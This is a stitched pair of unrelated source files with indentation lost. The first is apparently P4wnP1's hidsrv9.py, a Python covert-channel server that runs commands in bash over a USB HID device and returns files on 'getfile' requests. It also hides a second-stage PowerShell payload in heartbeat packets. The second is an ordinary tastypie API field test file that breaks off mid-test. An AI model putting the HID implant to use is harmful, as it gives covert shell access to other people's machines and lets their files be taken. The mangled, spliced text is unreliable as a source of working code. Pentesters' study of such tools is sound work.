# along with P4wnP1. If not, see <http://www.gnu.org/licenses/>.
# Works with SendHID6.ps1
import sys
import struct
import Queue
import subprocess
import thread
import signal
from select import select
import time
chunks = lambda A, chunksize=60: [A[i:i+chunksize] for i in range(0, len(A), chunksize)]
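# e.g. chunks("abcdefgh", 3) -> ["abc", "def", "gh"]; the default chunksize of 60
# matches the payload size of one report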
# single packet for a data stream to send
# 0: 1 Byte src
# 1: 1 Byte dst
# 2: 1 Byte snd
# 3: 1 Byte rcv
# 4-63 60 Bytes Payload
# client dst
# 1 stdin
# 2 stdout
# 3 stderr
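# A minimal sketch of the report layout above (illustrative helper with an
# assumed name, not part of the original tool; it uses the same '!BBBB60s'
# format as send_packet()/read_packet() below):
def _packet_layout_example():
    # pack one report: src=1, dst=2, snd=5 real payload bytes, rcv=0
    report = struct.pack('!BBBB60s', 1, 2, 5, 0, "hello")
    assert len(report) == 64  # exactly one 64-byte HID report
    src, dst, snd, rcv, payload = struct.unpack('!BBBB60s', report)
    # the snd field tells the receiver how many of the 60 payload bytes are real
    assert payload[:snd] == "hello"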
# reassemble received report fragments into full streams (keyed by (src, dst)) and enqueue them
def fragment_rcvd(qin, fragment_assembler, src=0, dst=0, data=""):
stream_id = (src, dst)
# if src == dst == 0, ignore (heartbeat)
if (src != 0 or dst !=0):
# check if stream already present
if fragment_assembler.has_key(stream_id):
# check if closing fragment (snd length = 0)
if (len(data) == 0):
# end of stream - add to input queue
stream = [src, dst, fragment_assembler[stream_id][2]]
qin.put(stream)
# delete from fragment_assembler
del fragment_assembler[stream_id]
else:
# append data to stream
fragment_assembler[stream_id][2] += data
#print repr(fragment_assembler[stream_id][2])
else:
# start stream, if not existing
data_arr = [src, dst, data]
fragment_assembler[stream_id] = data_arr
def send_datastream(qout, src=1, dst=1, data=""):
# split data into chunks fitting into packet payload (60 bytes)
chnks = chunks(data)
for chunk in chnks:
data_arr = [src, dst, chunk]
qout.put(data_arr)
# append empty packet to close stream
qout.put([src, dst, ""])
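# e.g. send_datastream(qout, 1, 2, "A" * 130) enqueues 60-, 60- and 10-byte
# fragments plus one zero-length fragment that marks end-of-stream (the same
# convention fragment_rcvd() applies to incoming data)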
def send_packet(f, src=1, dst=1, data="", rcv=0):
snd = len(data)
#print "Send size: " + str(snd)
packet = struct.pack('!BBBB60s', src, dst, snd, rcv, data)
#print packet.encode("hex")
f.write(packet)
def read_packet(f):
hidin = f.read(0x40)
#print "Input received (" + str(len(hidin)) + " bytes):"
#print hidin.encode("hex")
data = struct.unpack('!BBBB60s', hidin)
src = data[0]
dst = data[1]
snd = data[2]
rcv = data[3]
# reduce msg to real size
msg = data[4][0:snd]
return [src, dst, snd, rcv, msg]
def process_input(qin, subproc):
# HID input loop; runs in its own thread (started via thread.start_new_thread below)
# check if input queue contains data
while True:
if not qin.empty():
input = qin.get()
src=input[0]
dst=input[1]
stream=input[2]
# process received input
# stdin (redirect to bash)
if dst == 1:
command=stream
if command.upper() == "RESET_BASH":
# send sigint to bash
print "Restarting bash process"
reset_bash(subproc)
else:
print "running command '" + command + "'"
run_local_command(command, subproc)
# stdout
elif dst == 2:
print "Data received on stdout"
print stream
pass
# stderr
elif dst == 3:
pass
# getfile
elif dst == 4:
print "Data receiveced on dst=4 (getfile): " + stream
args=stream.split(" ",3)
if (len(args) < 3):
# too few arguments, echo this back with src=4, dst=3 (stderr)
print "Too few arguments"
send_datastream(qout, 4, 3, "P4wnP1 received 'getfile' with too few arguments")
# ToDo: files are reassembled here, this code should be moved into a separate method
else:
# check if the first word is "getfile"; ignore otherwise
if not args[0].strip().lower() == "getfile":
send_datastream(qout, 4, 3, "P4wnP1 received data on dst=4 (getfile) but the wrong request format was chosen")
continue
filename = args[1].strip()
varname = args[2].strip()
content = None
# try to open file, send error if not possible
try:
with open(filename, "rb") as f:
content = f.read() # naive approach, reading whole file at once (we split into chunks anyway)
except IOError as e:
# deliver Error to Client errorstream
send_datastream(qout, 4, 3, "Error on getfile: " + e.strerror)
continue
# send header
print "Varname " + str(varname)
send_datastream(qout, 4, 4, "BEGINFILE " + filename + " " + varname)
# send file content (should be chunked into multiple streams, but that would need reassembly on layer 5)
# note: the client has to read (and recognize) the ASCII-based header and footer streams, but the content itself could be binary
if content == None:
send_datastream(qout, 4, 3, "Error on getfile: No file content read")
else:
#send_datastream(qout, 4, 4, content)
streamchunksize=600
for chunk in chunks(content, streamchunksize):
send_datastream(qout, 4, 4, chunk)
# send footer
send_datastream(qout, 4, 4, "ENDFILE " + filename + " " + varname)
else:
print "Input in input queue:"
print input
def run_local_command(command, subproc):
bash = subproc[0]
sin = bash.stdin
sin.write(command + "\n")
sin.flush()
return
def process_bash_output(qout, subproc):
buf = ""
while True:
bash = subproc[0]
outstream = bash.stdout
#print "Reading stdout of bash on " + str(outstream)
# check for output which needs to be delivered from backing bash
try:
r,w,ex = select([outstream], [], [], 0.1)
except ValueError:
# we should land here if the output stream is closed
# because a new bash process was started
pass
if outstream in r:
byte = outstream.read(1)
if byte == "\n":
# full line received from subprocess, send it to HID
# note: the newline char isn't sent, as each output stream is printed on a separate line by the PowerShell client
# we set src=1 as we receive bash commands on dst=1
# dst = 2 (stdout of client)
send_datastream(qout, 2, 2, buf)
# clear buffer
buf = ""
else:
buf += byte
def process_bash_error(qout, subproc):
buf = ""
while True:
bash = subproc[0]
errstream = bash.stderr
# check for output which needs to be delivered from backing bash stderr
try:
r,w,ex = select([errstream], [], [], 0.1)
except ValueError:
# we should land here if the error stream is closed
# because a new bash process was started
pass
if errstream in r:
byte = errstream.read(1)
if byte == "\n":
# full line received from subprocess, send it to HID
# note: the newline char isn't sent, as each output stream is printed on a separate line by the PowerShell client
# dst = 3 (stderr of client)
send_datastream(qout, 3, 3, buf)
# clear buffer
buf = ""
else:
buf += byte
# As we don't pipe CTRL+C interrupts from the client through the HID data stream,
# there has to be another way to reset the bash process if it stalls.
# This can easily happen, as we don't support interactive commands waiting for input
# (this non-interactive shell restriction should be a known hurdle for every pentester out there)
def reset_bash(subproc):
bash = subproc[0]
bash.stdout.close()
bash.kill()
send_datastream(qout, 3, 3, "Bash process terminated")
bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
subproc[0] = bash
if bash.poll() == None:
send_datastream(qout, 3, 3, "New bash process started")
else:
send_datastream(qout, 3, 3, "Restarting bash failed")
# prepare a stream to answer a getfile request
def stream_from_getfile(filename):
with open(filename,"rb") as f:
content = f.read()
return content
# main code
qout = Queue.Queue()
qin = Queue.Queue()
fragment_assembler = {}
bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
subproc = [bash] # packed into array to allow easy "call by ref"
# process input
thread.start_new_thread(process_input, (qin, subproc))
# process output
thread.start_new_thread(process_bash_output, (qout, subproc))
# process error
thread.start_new_thread(process_bash_error, (qout, subproc))
# Initialize the second-stage payload (stage2.ps1), carried with heartbeat packets in an endless loop
with open("stage2.ps1","rb") as f:
stage2=f.read()
#initial_payload="#Hey this is the test data for an initial payload calling get-date on PS\nGet-Date"
stage2_chunks = chunks(stage2)
heartbeat_content = []
heartbeat_content += ["begin_heartbeat"]
heartbeat_content += stage2_chunks
heartbeat_content += ["end_heartbeat"]
heartbeat_counter = 0
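# Whenever the output queue is idle, the main loop below sends the next element
# of heartbeat_content, so one full cycle delivers: "begin_heartbeat", all
# stage2 chunks in order, "end_heartbeat"; the markers let the client locate
# the payload boundaries.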
with open("/dev/hidg1","r+b") as f:
# send test data stream
send_datastream(qout, 1, 1, "Hello from P4wnP1, this message has been sent through a HID device")
while True:
packet = read_packet(f)
src = packet[0]
dst = packet[1]
snd = packet[2]
rcv = packet[3]
msg = packet[4]
# put packet to input queue
fragment_rcvd(qin, fragment_assembler, src, dst, msg)
#print "Packet received"
#print "SRC: " + str(src) + " DST: " + str(dst) + " SND: " + str(snd) + " RCV: " + str(rcv)
#print "Payload: " + repr(msg)
# send data from output queue (empty packet otherwise)
if qout.empty():
# empty keep alive (rcv field filled)
#send_packet(f=f, src=0, dst=0, data="", rcv=snd)
# as the content "keep alive" packets (src=0, dst=0) is ignored
# by the PowerShell client, we use them to carry the initial payload
# in an endless loop
if heartbeat_counter == len(heartbeat_content):
heartbeat_counter = 0
send_packet(f=f, src=0, dst=0, data=heartbeat_content[heartbeat_counter], rcv=snd)
heartbeat_counter += 1
else:
packet = qout.get()
send_packet(f=f, src=packet[0], dst=packet[1], data=packet[2], rcv=snd)
|
mame82/P4wnP1
|
hidtools/hidsrv9.py
|
Python
|
gpl-3.0
| 10,097 | 0.029712 |
import datetime
from dateutil.tz import tzoffset
from decimal import Decimal
from django.db import models
from django.contrib.auth.models import User
from django.test import TestCase
from django.http import HttpRequest
from tastypie.bundle import Bundle
from tastypie.exceptions import ApiFieldError, NotFound
from tastypie.fields import NOT_PROVIDED, ApiField, BooleanField, CharField,\
DateField, DateTimeField, DecimalField, DictField, FileField, FloatField,\
IntegerField, ListField, TimeField, ToOneField, ToManyField
from tastypie.resources import ModelResource
from tastypie.utils import aware_datetime
from core.models import Note, Subject, MediaBit
from core.tests.mocks import MockRequest
class ApiFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = ApiField()
self.assertEqual(field_1.instance_name, None)
self.assertEqual(field_1.attribute, None)
self.assertEqual(field_1._default, NOT_PROVIDED)
self.assertEqual(field_1.null, False)
self.assertEqual(field_1.help_text, '')
self.assertEqual(field_1.use_in, 'all')
field_2 = ApiField(attribute='foo', default=True, null=True, readonly=True, help_text='Foo.', use_in="foo")
self.assertEqual(field_2.instance_name, None)
self.assertEqual(field_2.attribute, 'foo')
self.assertEqual(field_2._default, True)
self.assertEqual(field_2.null, True)
self.assertEqual(field_2.readonly, True)
self.assertEqual(field_2.help_text, 'Foo.')
self.assertEqual(field_1.use_in, 'all')
field_3 = ApiField(use_in="list")
self.assertEqual(field_3.use_in, 'list')
field_4 = ApiField(use_in="detail")
self.assertEqual(field_4.use_in, 'detail')
def use_in_callable(x):
return True
field_5 = ApiField(use_in=use_in_callable)
self.assertTrue(field_5.use_in is use_in_callable)
def test_dehydrated_type(self):
field_1 = ApiField()
self.assertEqual(field_1.dehydrated_type, 'string')
def test_has_default(self):
field_1 = ApiField()
self.assertEqual(field_1.has_default(), False)
field_2 = ApiField(default=True)
self.assertEqual(field_2.has_default(), True)
def test_default(self):
field_1 = ApiField()
self.assertEqual(isinstance(field_1.default, NOT_PROVIDED), True)
field_2 = ApiField(default=True)
self.assertEqual(field_2.default, True)
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# With no attribute or default, we should get ``None``.
field_1 = ApiField()
self.assertEqual(field_1.dehydrate(bundle), None)
# Still no attribute, so we should pick up the default
field_2 = ApiField(default=True)
self.assertEqual(field_2.dehydrate(bundle), True)
# Wrong attribute should yield default.
field_3 = ApiField(attribute='foo', default=True)
self.assertEqual(field_3.dehydrate(bundle), True)
# Wrong attribute should yield null.
field_4 = ApiField(attribute='foo', null=True)
self.assertEqual(field_4.dehydrate(bundle), None)
# Correct attribute.
field_5 = ApiField(attribute='title', default=True)
self.assertEqual(field_5.dehydrate(bundle), u'First Post!')
# Correct callable attribute.
field_6 = ApiField(attribute='what_time_is_it', default=True)
self.assertEqual(field_6.dehydrate(bundle), aware_datetime(2010, 4, 1, 0, 48))
def test_convert(self):
field_1 = ApiField()
self.assertEqual(field_1.convert('foo'), 'foo')
self.assertEqual(field_1.convert(True), True)
def test_hydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
# With no value, default or nullable, we should get an ``ApiFieldError``.
field_1 = ApiField()
field_1.instance_name = 'api'
self.assertRaises(ApiFieldError, field_1.hydrate, bundle)
# The default.
field_2 = ApiField(default='foo')
field_2.instance_name = 'api'
self.assertEqual(field_2.hydrate(bundle), 'foo')
# The callable default.
def foo():
return 'bar'
field_3 = ApiField(default=foo)
field_3.instance_name = 'api'
self.assertEqual(field_3.hydrate(bundle), 'bar')
# The nullable case.
field_4 = ApiField(null=True)
field_4.instance_name = 'api'
self.assertEqual(field_4.hydrate(bundle), None)
# The readonly case.
field_5 = ApiField(readonly=True)
field_5.instance_name = 'api'
bundle.data['api'] = 'abcdef'
self.assertEqual(field_5.hydrate(bundle), None)
# A real, live attribute!
field_6 = ApiField(attribute='title')
field_6.instance_name = 'api'
bundle.data['api'] = note.title
self.assertEqual(field_6.hydrate(bundle), u'First Post!')
# Make sure it uses attribute when there's no data
field_7 = ApiField(attribute='title')
field_7.instance_name = 'notinbundle'
self.assertEqual(field_7.hydrate(bundle), u'First Post!')
# Make sure it falls back to instance name if there is no attribute
field_8 = ApiField()
field_8.instance_name = 'title'
self.assertEqual(field_8.hydrate(bundle), u'First Post!')
# Attribute & null regression test.
# First, simulate data missing from the bundle & ``null=True``.
field_9 = ApiField(attribute='notinbundle', null=True)
field_9.instance_name = 'notinbundle'
self.assertEqual(field_9.hydrate(bundle), None)
# Then do something in the bundle also with ``null=True``.
field_10 = ApiField(attribute='title', null=True)
field_10.instance_name = 'title'
self.assertEqual(field_10.hydrate(bundle), u'First Post!')
# The blank case.
field_11 = ApiField(attribute='notinbundle', blank=True)
field_11.instance_name = 'notinbundle'
self.assertEqual(field_11.hydrate(bundle), None)
bundle.data['title'] = note.title
field_12 = ApiField(attribute='title', blank=True)
field_12.instance_name = 'title'
self.assertEqual(field_12.hydrate(bundle), u'First Post!')
class CharFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = CharField()
self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"')
field_2 = CharField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = CharField()
self.assertEqual(field_1.dehydrated_type, 'string')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = CharField(attribute='title', default=True)
self.assertEqual(field_1.dehydrate(bundle), u'First Post!')
field_2 = CharField(default=20)
self.assertEqual(field_2.dehydrate(bundle), u'20')
class FileFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = FileField()
self.assertEqual(field_1.help_text, 'A file URL as a string. Ex: "http://media.example.com/media/photos/my_photo.jpg"')
field_2 = FileField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = FileField()
self.assertEqual(field_1.dehydrated_type, 'string')
def test_dehydrate(self):
bit = MediaBit.objects.get(pk=1)
bundle = Bundle(obj=bit)
field_1 = FileField(attribute='image', default=True)
self.assertEqual(field_1.dehydrate(bundle), u'http://localhost:8080/media/lulz/catz.gif')
field_2 = FileField(default='http://media.example.com/img/default_avatar.jpg')
self.assertEqual(field_2.dehydrate(bundle), u'http://media.example.com/img/default_avatar.jpg')
bit = MediaBit.objects.get(pk=1)
bit.image = ''
bundle = Bundle(obj=bit)
field_3 = FileField(attribute='image', default=True)
self.assertEqual(field_3.dehydrate(bundle), None)
bit.image = None
bundle = Bundle(obj=bit)
field_4 = FileField(attribute='image', null=True)
self.assertEqual(field_4.dehydrate(bundle), None)
class IntegerFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = IntegerField()
self.assertEqual(field_1.help_text, 'Integer data. Ex: 2673')
field_2 = IntegerField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = IntegerField()
self.assertEqual(field_1.dehydrated_type, 'integer')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = IntegerField(default=25)
self.assertEqual(field_1.dehydrate(bundle), 25)
field_2 = IntegerField(default='20')
self.assertEqual(field_2.dehydrate(bundle), 20)
field_3 = IntegerField(default=18.5)
self.assertEqual(field_3.dehydrate(bundle), 18)
class FloatFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = FloatField()
self.assertEqual(field_1.help_text, 'Floating point numeric data. Ex: 26.73')
field_2 = FloatField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = FloatField()
self.assertEqual(field_1.dehydrated_type, 'float')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = FloatField(default=20)
self.assertEqual(field_1.dehydrate(bundle), 20.0)
field_2 = IntegerField(default=18.5)
self.assertEqual(field_2.dehydrate(bundle), 18)
class DecimalFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = DecimalField()
self.assertEqual(field_1.help_text, 'Fixed precision numeric data. Ex: 26.73')
field_2 = DecimalField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DecimalField()
self.assertEqual(field_1.dehydrated_type, 'decimal')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DecimalField(default='20')
self.assertEqual(field_1.dehydrate(bundle), Decimal('20.0'))
field_2 = DecimalField(default='18.5')
self.assertEqual(field_2.dehydrate(bundle), Decimal('18.5'))
field_3 = DecimalField(default=21.5)
self.assertEqual(field_3.dehydrate(bundle), Decimal('21.5'))
def test_hydrate(self):
bundle = Bundle(data={
'decimal-y': '18.50',
})
field_1 = DecimalField(default='20')
self.assertEqual(field_1.hydrate(bundle), Decimal('20.0'))
field_2 = DecimalField(default='18.5')
self.assertEqual(field_2.hydrate(bundle), Decimal('18.5'))
bundle = Bundle(data={'foo': '1.5'})
field_3 = DecimalField()
field_3.instance_name = 'foo'
self.assertEqual(field_3.hydrate(bundle), Decimal('1.5'))
bundle = Bundle(data={'foo': 'xxx'})
field_4 = DecimalField(attribute='foo')
field_4.instance_name = 'foo'
self.assertRaises(ApiFieldError, field_4.hydrate, bundle)
def test_model_resource_correct_association(self):
api_field = ModelResource.api_field_from_django_field(models.DecimalField())
self.assertEqual(api_field, DecimalField)
class ListFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = ListField()
self.assertEqual(field_1.help_text, "A list of data. Ex: ['abc', 26.73, 8]")
field_2 = ListField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = ListField()
self.assertEqual(field_1.dehydrated_type, 'list')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = ListField(default=[1, 2, 3])
self.assertEqual(field_1.dehydrate(bundle), [1, 2, 3])
field_2 = ListField(default=['abc'])
self.assertEqual(field_2.dehydrate(bundle), ['abc'])
class DictFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = DictField()
self.assertEqual(field_1.help_text, "A dictionary of data. Ex: {'price': 26.73, 'name': 'Daniel'}")
field_2 = DictField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DictField()
self.assertEqual(field_1.dehydrated_type, 'dict')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DictField(default={'price': 12.34, 'name': 'Daniel'})
self.assertEqual(field_1.dehydrate(bundle), {'price': 12.34, 'name': 'Daniel'})
field_2 = DictField(default={'name': 'Daniel'})
self.assertEqual(field_2.dehydrate(bundle), {'name': 'Daniel'})
class BooleanFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = BooleanField()
self.assertEqual(field_1.help_text, 'Boolean data. Ex: True')
field_2 = BooleanField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = BooleanField()
self.assertEqual(field_1.dehydrated_type, 'boolean')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = BooleanField(attribute='is_active', default=False)
self.assertEqual(field_1.dehydrate(bundle), True)
field_2 = BooleanField(default=True)
self.assertEqual(field_2.dehydrate(bundle), True)
class TimeFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = TimeField()
self.assertEqual(field_1.help_text, 'A time as string. Ex: "20:05:23"')
field_2 = TimeField(help_text='Custom.')
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = TimeField()
self.assertEqual(field_1.dehydrated_type, 'time')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = TimeField(attribute='created')
self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5))
field_2 = TimeField(default=datetime.time(23, 5, 58))
self.assertEqual(field_2.dehydrate(bundle), datetime.time(23, 5, 58))
field_3 = TimeField(attribute='created_string')
note.created_string = '13:06:00'
self.assertEqual(field_3.dehydrate(bundle), datetime.time(13, 6))
note.created_string = '13:37:44'
self.assertEqual(field_3.dehydrate(bundle), datetime.time(13, 37, 44))
note.created_string = 'hello'
self.assertRaises(ApiFieldError, field_3.dehydrate, bundle)
def test_hydrate(self):
bundle_1 = Bundle(data={'time': '03:49'})
field_1 = TimeField(attribute='created')
field_1.instance_name = 'time'
self.assertEqual(field_1.hydrate(bundle_1), datetime.time(3, 49))
bundle_2 = Bundle()
field_2 = TimeField(default=datetime.time(17, 40))
field_2.instance_name = 'doesnotmatter'  # Won't be found in bundle data
self.assertEqual(field_2.hydrate(bundle_2), datetime.time(17, 40))
bundle_3 = Bundle(data={'time': '22:08:11'})
field_3 = TimeField(attribute='created_string')
field_3.instance_name = 'time'
self.assertEqual(field_3.hydrate(bundle_3), datetime.time(22, 8, 11))
bundle_4 = Bundle(data={'time': '07:45'})
field_4 = TimeField(attribute='created')
field_4.instance_name = 'time'
self.assertEqual(field_4.hydrate(bundle_4), datetime.time(7, 45))
bundle_5 = Bundle(data={'time': None})
field_5 = TimeField(attribute='created', null=True)
field_5.instance_name = 'time'
self.assertEqual(field_5.hydrate(bundle_5), None)
class DateFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = DateField()
self.assertEqual(field_1.help_text, 'A date as a string. Ex: "2010-11-10"')
field_2 = DateField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DateField()
self.assertEqual(field_1.dehydrated_type, 'date')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DateField(attribute='created')
self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5))
field_2 = DateField(default=datetime.date(2010, 4, 1))
self.assertEqual(field_2.dehydrate(bundle), datetime.date(2010, 4, 1))
note.created_string = '2010-04-02'
field_3 = DateField(attribute='created_string')
self.assertEqual(field_3.dehydrate(bundle), datetime.date(2010, 4, 2))
def test_hydrate(self):
bundle_1 = Bundle(data={
'date': '2010-05-12',
})
field_1 = DateField(attribute='created')
field_1.instance_name = 'date'
self.assertEqual(field_1.hydrate(bundle_1), datetime.date(2010, 5, 12))
bundle_2 = Bundle()
field_2 = DateField(default=datetime.date(2010, 4, 1))
field_2.instance_name = 'date'
self.assertEqual(field_2.hydrate(bundle_2), datetime.date(2010, 4, 1))
bundle_3 = Bundle(data={
'date': 'Wednesday, May 12, 2010',
})
field_3 = DateField(attribute='created_string')
field_3.instance_name = 'date'
self.assertEqual(field_3.hydrate(bundle_3), datetime.date(2010, 5, 12))
bundle_4 = Bundle(data={
'date': '5 Apr 2010',
})
field_4 = DateField(attribute='created')
field_4.instance_name = 'date'
self.assertEqual(field_4.hydrate(bundle_4), datetime.date(2010, 4, 5))
bundle_5 = Bundle(data={
'date': None,
})
field_5 = DateField(attribute='created', null=True)
field_5.instance_name = 'date'
self.assertEqual(field_5.hydrate(bundle_5), None)
def test_model_resource_correct_association(self):
api_field = ModelResource.api_field_from_django_field(models.DateField())
self.assertEqual(api_field, DateField)
class DateTimeFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = DateTimeField()
self.assertEqual(field_1.help_text, 'A date & time as a string. Ex: "2010-11-10T03:07:43"')
field_2 = DateTimeField(help_text="Custom.")
self.assertEqual(field_2.help_text, 'Custom.')
def test_dehydrated_type(self):
field_1 = DateTimeField()
self.assertEqual(field_1.dehydrated_type, 'datetime')
def test_dehydrate(self):
note = Note.objects.get(pk=1)
bundle = Bundle(obj=note)
field_1 = DateTimeField(attribute='created')
self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5))
field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 1, 7))
self.assertEqual(field_2.dehydrate(bundle), aware_datetime(2010, 4, 1, 1, 7))
note.created_string = '2010-04-02 01:11:00'
field_3 = DateTimeField(attribute='created_string')
self.assertEqual(field_3.dehydrate(bundle), aware_datetime(2010, 4, 2, 1, 11))
def test_hydrate(self):
bundle_1 = Bundle(data={
'datetime': '2010-05-12 10:36:28',
})
field_1 = DateTimeField(attribute='created')
field_1.instance_name = 'datetime'
self.assertEqual(field_1.hydrate(bundle_1), aware_datetime(2010, 5, 12, 10, 36, 28))
bundle_2 = Bundle()
field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 2, 0))
field_2.instance_name = 'datetime'
self.assertEqual(field_2.hydrate(bundle_2), aware_datetime(2010, 4, 1, 2, 0))
bundle_3 = Bundle(data={
'datetime': 'Tue, 30 Mar 2010 20:05:00 -0500',
})
field_3 = DateTimeField(attribute='created_string')
field_3.instance_name = 'datetime'
self.assertEqual(field_3.hydrate(bundle_3), aware_datetime(2010, 3, 30, 20, 5, tzinfo=tzoffset(None, -18000)))
bundle_4 = Bundle(data={
'datetime': None,
})
field_4 = DateField(attribute='created', null=True)
field_4.instance_name = 'datetime'
self.assertEqual(field_4.hydrate(bundle_4), None)
bundle_5 = Bundle(data={'datetime': 'foo'})
field_5 = DateTimeField()
field_5.instance_name = 'datetime'
self.assertRaises(ApiFieldError, field_5.hydrate, bundle_5)
bundle_6 = Bundle(data={'datetime': ['a', 'list', 'used', 'to', 'crash']})
field_6 = DateTimeField()
field_6.instance_name = 'datetime'
self.assertRaises(ApiFieldError, field_6.hydrate, bundle_6)
def test_model_resource_correct_association(self):
api_field = ModelResource.api_field_from_django_field(models.DateTimeField())
self.assertEqual(api_field, DateTimeField)
class UserResource(ModelResource):
class Meta:
resource_name = 'users'
queryset = User.objects.all()
def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
if bundle_or_obj is None:
return '/api/v1/users/'
return '/api/v1/users/%s/' % bundle_or_obj.obj.id
class ToOneFieldTestCase(TestCase):
fixtures = ['note_testdata.json']
def test_init(self):
field_1 = ToOneField(UserResource, 'author')
self.assertEqual(field_1.instance_name, None)
self.assertEqual(issubclass(field_1.to, UserResource), True)
self.assertEqual(field_1.attribute, 'author')
self.assertEqual(field_1.related_name, None)
self.assertEqual(field_1.null, False)
self.assertEqual(field_1.full, False)
self.assertEqual(field_1.readonly, False)
self.assertEqual(field_1.help_text, 'A single related resource. Can be either a URI or set of nested resource data.')
field_2 = ToOneField(UserResource, 'author', null=True, help_text="Points to a User.")
self.assertEqual(field_2.instance_name, None)
self.assertEqual(issubclass(field_2.to, UserResource), True)
self.assertEqual(field_2.attribute, 'author')
self.assertEqual(field_2.related_name, None)
self.assertEqual(field_2.null, True)
self.assertEqual(field_2.full, False)
self.assertEqual(field_2.readonly, False)
self.assertEqual(field_2.help_text, 'Points to a User.')
field_3 = ToOneField(UserResource, 'author', default=1, null=True, help_text="Points to a User.")
self.assertEqual(field_3.instance_name, None)
self.assertEqual(issubclass(field_3.to, UserResource), True)
self.assertEqual(field_3.attribute, 'author')
self.assertEqual(field_3.related_name, None)
self.assertEqual(field_3.null, True)
self.assertEqual(field_3.default, 1)
self.assertEqual(field_3.full, False)
self.assertEqual(field_3.readonly, False)
self.assertEqual(field_3.help_text, 'Points to a User.')
field_4 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.")
self.assertEqual(field_4.instance_name, None)
self.assertEqual(issubclass(field_4.to, UserResource), True)
self.assertEqual(field_4.attribute, 'author')
self.assertEqual(field_4.related_name, None)
self.assertEqual(field_4.null, True)
self.assertEqual(field_4.default, 1)
self.assertEqual(field_4.full, False)
self.assertEqual(field_4.readonly, True)
self.assertEqual(field_4.help_text, 'Points to a User.')
field_5 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="list")
self.assertEqual(field_5.use_in, 'list')
field_6 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="detail")
self.assertEqual(field_6.use_in, 'detail')
def use_in_callable(x):
return True
field_7 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in=use_in_callable)
self.assertTrue(field_7.use_in is use_in_callable)
field_8 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.", use_in="foo")
self.assertEqual(field_8.use_in, 'all')
def test_dehydrated_type(self):
field_1 = ToOneField(UserResource, 'author')
self.assertEqual(field_1.dehydrated_type, 'related')
def test_has_default(self):
field_1 = ToOneField(UserResource, 'author')
self.assertEqual(field_1.has_default(), False)
field_1 = ToOneField(UserResource, 'author', default=1)
self.assertEqual(field_1.has_default(), True)
def test_default(self):
field_1 = ToOneField(UserResource, 'author')
self.assertTrue(isinstance(field_1.default, NOT_PROVIDED))
field_2 = ToOneField(UserResource, 'author', default=1)
self.assertEqual(field_2.default, 1)
def test_dehydrate(self):
note = Note()
bundle = Bundle(obj=note)
field_1 = ToOneField(UserResource, 'author')
self.assertRaises(ApiFieldError, field_1.dehydrate, bundle)
field_2 = ToOneField(UserResource, 'author', null=True)
